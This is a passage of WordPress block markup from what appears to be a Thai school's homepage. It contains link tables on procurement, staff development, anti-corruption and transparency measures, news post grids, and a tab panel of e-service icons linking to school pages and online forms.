href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" 